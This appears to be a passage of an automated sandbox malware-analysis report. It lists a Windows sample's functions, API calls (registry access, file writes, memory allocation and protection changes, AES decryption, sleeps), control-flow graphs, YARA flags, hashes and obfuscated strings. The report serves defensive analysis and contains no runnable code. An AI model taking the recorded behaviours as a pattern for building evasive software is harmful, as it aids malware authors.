                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A9B8E
                                            • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A9BB5
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 009A9C0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: Open$InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1247124224-0
                                            • Opcode ID: 8f5395f15a7e6009a0a41f0eae9c4a833aec8fea66ce04d55efc0adb1027a24b
                                            • Instruction ID: 967858448a74c5b8fdc351f44aa9a1ff1d82db67f0d4b7c3c9c634ef2744a961
                                            • Opcode Fuzzy Hash: 8f5395f15a7e6009a0a41f0eae9c4a833aec8fea66ce04d55efc0adb1027a24b
                                            • Instruction Fuzzy Hash: A03107B150410E9FEF15DF24C848BDE3BA9EF06320F100529E885C6941D7764DA8CB5D
                                            Function 009A7263 Relevance: 4.6, APIs: 3, Instructions: 67registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3582 9a7263 3583 9a722b-9a7230 3582->3583 3584 9a9b40-9a9b79 3582->3584 3583->3584 3586 9a9b7b-9a9b96 RegOpenKeyA 3584->3586 3587 9a9ba2-9a9bbd RegOpenKeyA 3584->3587 3586->3587 3588 9a9b98 3586->3588 3589 9a9bbf-9a9bc9 3587->3589 3590 9a9bd5-9a9c01 3587->3590 3588->3587 3589->3590 3593 9a9c0e-9a9c18 3590->3593 3594 9a9c03-9a9c0c GetNativeSystemInfo 3590->3594 3595 9a9c1a 3593->3595 3596 9a9c24-9a9c32 3593->3596 3594->3593 3595->3596 3598 9a9c3e-9a9c45 3596->3598 3599 9a9c34 3596->3599 3600 9a9c4b-9a9c52 3598->3600 3601 9a9c58-9aab26 3598->3601 3599->3598 3600->3601
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A9B8E
                                            • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A9BB5
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 009A9C0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: Open$InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1247124224-0
                                            • Opcode ID: 7f4c88c98d52ebf0b5f66e1e4452e71dde133532125133a819a5546527767ad7
                                            • Instruction ID: 9cb63e03738a866659b73c7b25d96e4ba8ecebe99b58e2aad2c2e6a49e54624a
                                            • Opcode Fuzzy Hash: 7f4c88c98d52ebf0b5f66e1e4452e71dde133532125133a819a5546527767ad7
                                            • Instruction Fuzzy Hash: 5231F8B150414E9FEF11DF54C849ADE3BA9FB06320F100525E886C6942D7768DA4DB5D
                                            Function 004021F0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3603 4021f0-40220b 3604 40226b-40227c call 4099d7 3603->3604 3605 40220d-402211 3603->3605 3605->3604 3607 402213-402231 CreateFileA 3605->3607 3607->3604 3609 402233-402260 WriteFile CloseHandle call 4099d7 3607->3609 3611 402265-402268 3609->3611
                                            APIs
                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                            • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID:
                                            • API String ID: 1065093856-0
                                            • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                            • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758
                                            Function 00410536 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3612 410536-410542 call 410567 3615 410554-410560 call 410580 ExitProcess 3612->3615 3616 410544-41054e GetCurrentProcess TerminateProcess 3612->3616 3616->3615
                                            APIs
                                            • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,CA335CE0,0040CDA2,08758BC2), ref: 00410547
                                            • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,CA335CE0,0040CDA2,08758BC2), ref: 0041054E
                                            • ExitProcess.KERNEL32 ref: 00410560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                            • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48
                                            Function 00AA2980 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a9f000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: X#
                                            • API String ID: 3472027048-2102606547
                                            • Opcode ID: 68a77c693dcf5cb7bdefffbca0653f7cf93629ca2f19a54ed51aa18d7c4b4147
                                            • Instruction ID: cdd1864e854e9b2156b480f1b6f7b4d83ba3b1aca43268435479a91fe71fa2e8
                                            • Opcode Fuzzy Hash: 68a77c693dcf5cb7bdefffbca0653f7cf93629ca2f19a54ed51aa18d7c4b4147
                                            • Instruction Fuzzy Hash: E61190B220C204DBD3455E5CD98177ABBB8EB5A320F204A2DE6D6C76C0D7368C60A767
                                            Function 004132B1 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                            • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 485612231-0
                                            • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                            • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C
                                            Function 04B30E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,04B30223,?,?), ref: 04B30E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,04B30223,?,?), ref: 04B30E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: 80204d9dadda779159a18004c4534a74a454aa2116389914757bd1600e5133ef
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: 9DD0123164512877D7003A95DC09BCD7B1CDF09B63F008451FB0DD9080C770954046E5
                                            Function 00413C79 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                            • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                            Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                            • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                            • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                            • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                            Function 00AA0672 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?), ref: 00AA0688
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a9f000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 313641539ed57d46eadc6db5f5ee68a832c6f3dbb26f0f7f367f2611c43db9b7
                                            • Instruction ID: 72bebe54cbcd4c1b21a3a6395e488c8d241c558ba3029e190c2772d5dabd2552
                                            • Opcode Fuzzy Hash: 313641539ed57d46eadc6db5f5ee68a832c6f3dbb26f0f7f367f2611c43db9b7
                                            • Instruction Fuzzy Hash: 70E04FB244835EDBDB42EF14C990A9F7B61EF8A200F208119B84043E45D7759C308A4A
                                            Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 10005C07
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast_free
                                            • String ID:
                                            • API String ID: 1353095263-0
                                            • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                            • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                            • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                            • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                            Function 00F0CD4D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F0CD9E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: c45bad4500735b764e5324259663bc145a2bc627cd6e75c41da29571dcd267e1
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: C8112B79A40208EFDB01DF98C985E98BFF5AF08351F0580A4F9489B362D375EA50EB80
                                            Function 00402E30 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                            • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                            Function 00402E50 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                            • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84

                                            Non-executed Functions

                                            Function 04B33F87 Relevance: 43.8, APIs: 20, Strings: 4, Instructions: 1839sleepcomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04B33FF1
                                            • Sleep.KERNEL32(000003E8), ref: 04B34189
                                            • __Init_thread_footer.LIBCMT ref: 04B3475E
                                            • __Init_thread_footer.LIBCMT ref: 04B34924
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04B36D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B34B2E
                                            • __Init_thread_footer.LIBCMT ref: 04B34BBC
                                            • __Init_thread_footer.LIBCMT ref: 04B34E25
                                            • CoInitialize.OLE32(00000000), ref: 04B34EA6
                                            • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04B34EC1
                                            • __Init_thread_footer.LIBCMT ref: 04B35324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04B36CE8,0041D8A0,0042DB20,0042DB21), ref: 04B3553C
                                            • __Init_thread_footer.LIBCMT ref: 04B35632
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04B36D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B34F2F
                                              • Part of subcall function 04B40A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B35CE6,00000000,0042C014), ref: 04B40A5E
                                              • Part of subcall function 04B40A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B40A7D
                                            • __Init_thread_footer.LIBCMT ref: 04B3428D
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                              • Part of subcall function 04B32457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04B3248D
                                              • Part of subcall function 04B32457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04B324AE
                                              • Part of subcall function 04B32457: CloseHandle.KERNEL32(00000000), ref: 04B324B5
                                            • __Init_thread_footer.LIBCMT ref: 04B34469
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 529012138-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: b593145d82870a6fc1d2920334d02843d9d5b5ae120ccabb0440fae50379a723
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: C3F2F2B0E042589FEB28CF25CC48B9DBBB0EF45309F5442E8E4096B291DB75BA85CF55
                                            Function 04CF3120 Relevance: 22.8, APIs: 8, Strings: 4, Instructions: 1839COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF3426
                                            • __Init_thread_footer.LIBCMT ref: 04CF3602
                                            • __Init_thread_footer.LIBCMT ref: 04CF38F7
                                            • __Init_thread_footer.LIBCMT ref: 04CF3ABD
                                            • __Init_thread_footer.LIBCMT ref: 04CF44BD
                                            • __Init_thread_footer.LIBCMT ref: 04CF47CB
                                            • __Init_thread_footer.LIBCMT ref: 04CF3D55
                                              • Part of subcall function 04CFFBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFC16
                                            • __Init_thread_footer.LIBCMT ref: 04CF3FBE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 829385169-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: ae2518c10b7240bfbf3f7855123300b7a987f6d8a73eb5c6b6008d334885f17f
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: 13F2F5B0E042549FEB64DF24CC48BADBBB2EF04304F5442D8D6096B291DB79BA85CF59
                                            Function 04B33817 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04B33897
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B338BB
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B33925
                                            • GetLastError.KERNEL32 ref: 04B3392F
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B33957
                                            • GetLastError.KERNEL32 ref: 04B33961
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B33971
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B33A33
                                            • CryptDestroyKey.ADVAPI32(?), ref: 04B33AA5
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B33873
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction ID: 38cc04df8a71c6855082909edac3cad1f9d42561c993af5c993a513f440f503f
                                            • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction Fuzzy Hash: FF816B71A00218AFEF248F25CC45B9EBBB5EF49301F1481E9E94DA7291DB31AE858F51
                                            Function 04B351B7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B40A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B35CE6,00000000,0042C014), ref: 04B40A5E
                                              • Part of subcall function 04B40A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B40A7D
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B35324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04B36CE8,0041D8A0,0042DB20,0042DB21), ref: 04B3553C
                                            • __Init_thread_footer.LIBCMT ref: 04B35632
                                            • Sleep.KERNEL32(000007D0), ref: 04B3599C
                                            • Sleep.KERNEL32(000007D0), ref: 04B359B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$updateSW
                                            • API String ID: 3554146954-1114742100
                                            • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction ID: 3055a7e41b21dccbcaaa8ca119a724a9f22e98cadea9129be8f56bed535e2076
                                            • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction Fuzzy Hash: AA3220B0E002549BEF28DF25CC887ADBBB0AF45309F1442E9D8096B291DB74BE84CF55
                                            Function 04CF4350 Relevance: 10.4, APIs: 3, Strings: 2, Instructions: 1645COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04CFFBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFC16
                                            • __Init_thread_footer.LIBCMT ref: 04CF44BD
                                            • __Init_thread_footer.LIBCMT ref: 04CF47CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$U%
                                            • API String ID: 829385169-3435397596
                                            • Opcode ID: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                            • Instruction ID: b26fc266fe437071b37e89948e38149a4b38e7e9c8995aca789c2764ccb3574b
                                            • Opcode Fuzzy Hash: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                            • Instruction Fuzzy Hash: 4BD24771E002549BEB58EF24CC547EEBB76AF00308F5441A8DA096B291DB38BF85CF95
                                            Function 0041A306 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                            • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                            Function 0098CB32 Relevance: 9.1, Strings: 6, Instructions: 1638COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
